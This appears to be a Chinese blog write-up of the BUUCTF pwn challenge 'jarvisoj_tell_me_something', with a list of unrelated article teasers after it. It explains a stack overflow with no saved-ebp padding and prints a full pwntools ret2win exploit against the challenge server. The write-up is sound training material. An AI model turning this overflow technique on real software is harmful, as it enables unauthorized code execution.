您现在的位置是:首页 > 正文

jarvisoj_tell_me_something【BUUCTF】

2024-04-01 04:55:54阅读 1

在这里插入图片描述
发现只开启了NX,IDA分析:
在这里插入图片描述
明显存在溢出漏洞,并且发现存在漏洞函数:
在这里插入图片描述
那就很简单了,溢出指向漏洞函数即可,但此题有个小坑,其实最开始学pwn时会通过gdb查找溢出大小,但后面懒了就直接通过IDA查看,但IDA并不一定准确,并且题目本身也会有坑,比如该题。通常main函数会先执行push ebp的操作,如:
在这里插入图片描述
但本题,main函数没有push ebp的操作,所有溢出时不需要多加8字节ebp位置
在这里插入图片描述
完整exp:

from pwn import *
context.log_level = True
io=remote("node4.buuoj.cn", 29258)
elf = ELF("./guestbook")
good_game_addr = elf.symbols["good_game"]

payload = b'A'*(0x88) + p64(good_game_addr)
io.recvline()
io.sendline(payload)
io.recv()
io.interactive()

网站文章

  • 在Junit测试中模拟控制台输入输出

    在Junit测试中模拟控制台输入输出

    目录在Junit测试中模拟控制台输入输出Java标准输入输出流自定义输入输出流1. 设置输入流2. 设置输出流在Junit测试中模拟控制台交互在Junit测试中模拟控制台输入输出最近的一次软件构造实验...

    2024-04-01 04:55:46
  • Java HashMap 可以存储null

    HashMap = map new HashMap(); map.put(null,null); 这样写是可以的

    2024-04-01 04:55:06
  • 大学生如何把自己往软件工程师方向培养?

    就大学生而言如何把自己往软件工程师方向培养?就目前自己已经学习的专业课程而言,从课本学习的专业知识还不足以让我们明白一个软件是如何做出来的,网络上的知识大多数回答不符合我们的实际情况,而且回答都比较偏专业和笼统。...

    2024-04-01 04:54:59
  • 解决使用Ajax:浏览器跨域同源问题

    解决使用Ajax:浏览器跨域同源问题

    chrome错误提示:Access to XMLHttpRequest at 'http://192.168.23.11:5000/' from origin 'http://localhost:63...

    2024-04-01 04:54:52
  • Decimal是什么类型

    decimal是MySQL中存在的精准数据类型,语法格式“DECIMAL(M,D)”。类型说明 取值范围(MySQL < 3.23) 取值范围(MySQL >= 3.23)D是小数点右侧数字的数目(标度),其范围是“0~30”,但不得超过M。M是数字的最大数(精度),其范围为“1~65”,默认值是10;

    2024-04-01 04:54:44
  • FFmpegFrameGrabber视频抽帧工具类

    FFmpegFrameGrabber视频抽帧工具类

    通过视频链接进行关键帧抽取图片,核对利用FFmpegFrameGrabber对视频流进行抽帧处理。

    2024-04-01 04:54:04
  • 各种浏览器的缓存文件的位置和修改缓存目录的方法 热门推荐

    一、手动清空缓存 1、Opera 清除Opera浏览器的缓存的方法:打开Opera,工具->首选项->高级->历史->点击立即清空按钮就可以清除Opera浏览器的缓存。 2、I...

    2024-04-01 04:53:59
  • 一、需求测试-需求规格说明书规范(测试方向)

    有测试的小伙伴不太清楚需求测试的范围及规范,整理了下,希望可以帮到大家。需求规格说明书应该遵循的原则:1.功能和实现分离,即描述要实现的结果结果,不要描述实现的过程2.要求使用面向处理的规格说明语言,...

    2024-04-01 04:53:52
  • 关于Vue Element组件el-checkbox与el-select默认选中值的几点注意事项

    关于Vue Element组件el-checkbox与el-select默认选中值的几点注意事项

    el-select 示例: 代码: &l

    2024-04-01 04:53:13
  • 从泊松方程到泊松融合(Poisson Matting) 热门推荐

    数学无疑是现代数字图像处理技术的一个重要基石,一些效果显著的同时也非常popular的图像处理技术中大量地借鉴和利用了经典数学理论中的一些著名的成果。泊松方程(Poisson Equation)在泊松图像编辑(Poisson Image Editing)以及泊松融合(Poisson Matting)中的应用就是一个典型的例子

    2024-04-01 04:53:06